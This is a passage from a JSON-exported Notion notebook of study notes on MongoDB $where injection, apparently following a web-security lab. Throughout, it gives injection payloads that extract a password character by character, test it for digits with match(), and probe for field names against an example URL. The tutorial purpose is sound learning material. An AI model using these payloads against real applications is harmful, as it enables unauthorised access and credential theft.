'a'=='b'\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-807c-831a-c5ddd1be371b","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the first password character ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the first password character ","href":null},{"type":"text","text":{"content":"is 'a'","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"is 'a'","href":null},{"type":"text","text":{"content":", the condition is true → data is returned.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", the condition is true → data is returned.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80f5-a5eb-d91648c560ec","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If it’s not 'a', the condition is false → no data returned.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If it’s not 'a', the condition is false → no data returned.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-802f-9446-d4b4430c3fd6","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"By testing different characters, you can recover the whole password.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"By testing different characters, you can recover the whole password.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8084-9e92-cebc1ef9239c","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:51:00.000Z","last_edited_time":"2025-08-16T10:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"251dc9c5-3059-80af-9418-fe2335101eb7","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T11:19:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Case 2: Check if password contains digits using JS function ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Case 2: Check if password contains digits using JS function ","href":null},{"type":"text","text":{"content":"match()","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"match()","href":null},{"type":"text","text":{"content":" ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" ","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80b7-8db7-d04542172db3","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:52:00.000Z","last_edited_time":"2025-08-16T10:52:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"You could also use the JavaScript ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You could also use the JavaScript ","href":null},{"type":"text","text":{"content":"match()","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"match()","href":null},{"type":"text","text":{"content":" function to extract information. For example, the following payload enables you to identify whether the password contains digits:\nPayload:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" function to extract information. For example, the following payload enables you to identify whether the password contains digits:\nPayload:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80a1-b1a0-df9b3f085d56","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.password.match(/\\d/) || 'a'=='b","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.password.match(/\\d/) || 'a'=='b","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80ca-abb2-d9921a154d65","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:50:00.000Z","last_edited_time":"2025-08-16T10:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Full query becomes:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Full query becomes:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-801b-bcfb-f6690d7401aa","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:50:00.000Z","last_edited_time":"2025-08-16T10:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.password.match(/\\\\d/) || 'a'=='b'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.password.match(/\\\\d/) || 'a'=='b'\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-807a-ba9a-e4d10b84b0c8","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"this.password.match(/\\d/)","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"this.password.match(/\\d/)","href":null},{"type":"text","text":{"content":" checks if any digit is in the password.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" checks if any digit is in the password.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-803f-b889-d66cec2cfc1d","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If true → data is returned, confirming there’s at least one digit.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If true → data is returned, confirming there’s at least one digit.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-80f0-8563-dceda5e373bc","parent":{"type":"block_id","block_id":"251dc9c5-3059-80d5-933a-d326bf6a924e"},"created_time":"2025-08-16T10:53:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Identifying field names","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Identifying field names","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-807f-8b7a-eb7309a55cbc","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"MongoDB is ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"MongoDB is ","href":null},{"type":"text","text":{"content":"schema-less","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"schema-less","href":null},{"type":"text","text":{"content":", meaning collections don’t have fixed fields.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", meaning collections don’t have fixed fields.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-805c-a497-e24d3d308b90","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Before extracting data, you must confirm what fields (like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Before extracting data, you must confirm what fields (like ","href":null},{"type":"text","text":{"content":"password","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"password","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"email","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"email","href":null},{"type":"text","text":{"content":", etc.) actually exist.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", etc.) actually exist.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80b8-9be0-ca7d5530d729","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"251dc9c5-3059-80b1-bbb5-c6eabad2a162","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"heading_3","heading_3":{"rich_text":[{"type":"text","text":{"content":"Example payload to test a field","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Example payload to test a field","href":null}],"is_toggleable":false,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80d8-91aa-fc1ed6633b8d","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The URL:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The URL:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80e0-a9c2-d9ed7b245427","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"https://insecure-website.com/user/lookup?username=admin'+%26%26+this.password!%3d'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://insecure-website.com/user/lookup?username=admin'+%26%26+this.password!%3d'","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-800a-ab89-f0ef5dc6233d","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Decoded payload:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Decoded payload:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80aa-8844-fbfaeecaffae","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:55:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.password!='","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.password!='","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-809d-8f24-f5d3f9a677d6","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"This injects into the query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This injects into the query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80bf-bad9-cf23d27a59de","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:55:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.password!=''\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.password!=''\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8071-94e0-e28cb8d76318","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the field ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the field ","href":null},{"type":"text","text":{"content":"password","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"password","href":null},{"type":"text","text":{"content":" ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" ","href":null},{"type":"text","text":{"content":"exists","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"exists","href":null},{"type":"text","text":{"content":", the query runs normally and returns a result.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", the query runs normally and returns a result.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-806c-9294-c872c3db4f37","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If it ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If it ","href":null},{"type":"text","text":{"content":"doesn’t exist","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"doesn’t exist","href":null},{"type":"text","text":{"content":", the query may fail or behave differently.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", the query may fail or behave differently.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8027-96a5-c5d8ed66ef69","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"251dc9c5-3059-8037-bc02-ea2e6f6e177c","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"heading_3","heading_3":{"rich_text":[{"type":"text","text":{"content":"Comparing with known and unknown fields","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Comparing with known and unknown fields","href":null}],"is_toggleable":false,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8046-aaf7-e76383991534","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:54:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"You know ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You know ","href":null},{"type":"text","text":{"content":"username","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"username","href":null},{"type":"text","text":{"content":" exists, so you test three payloads:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" exists, so you test three payloads:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-802a-9472-d97c86382c34","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Existing field:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Existing field:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-80fd-929d-f3bf3dcd0716","parent":{"type":"block_id","block_id":"251dc9c5-3059-802a-9472-d97c86382c34"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.username!='","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.username!='","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80e3-afcd-dde56c019760","parent":{"type":"block_id","block_id":"251dc9c5-3059-802a-9472-d97c86382c34"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80bb-9b89-d5cd86079e39","parent":{"type":"block_id","block_id":"251dc9c5-3059-802a-9472-d97c86382c34"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.username!=''\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.username!=''\"}","href":null}],"language":"javascript"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-8050-aafd-cf136f1c2a1e","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Suspected field (password):","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Suspected field (password):","href":null}],"color":"default","list_start_index":2},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-80bb-b7c0-cdbcd6f1defd","parent":{"type":"block_id","block_id":"251dc9c5-3059-8050-aafd-cf136f1c2a1e"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.password!='","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.password!='","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-805b-beeb-c4fe6c4c2aa0","parent":{"type":"block_id","block_id":"251dc9c5-3059-8050-aafd-cf136f1c2a1e"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80e8-bdb4-c109c2a62700","parent":{"type":"block_id","block_id":"251dc9c5-3059-8050-aafd-cf136f1c2a1e"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.password!=''\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.password!=''\"}","href":null}],"language":"javascript"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-801c-9b90-f49765e711ed","parent":{"type":"block_id","block_id":"251dc9c5-3059-80f0-8563-dceda5e373bc"},"created_time":"2025-08-16T10:54:00.000Z","last_edited_time":"2025-08-16T10:58:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Non-existent field (foo):","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Non-existent field 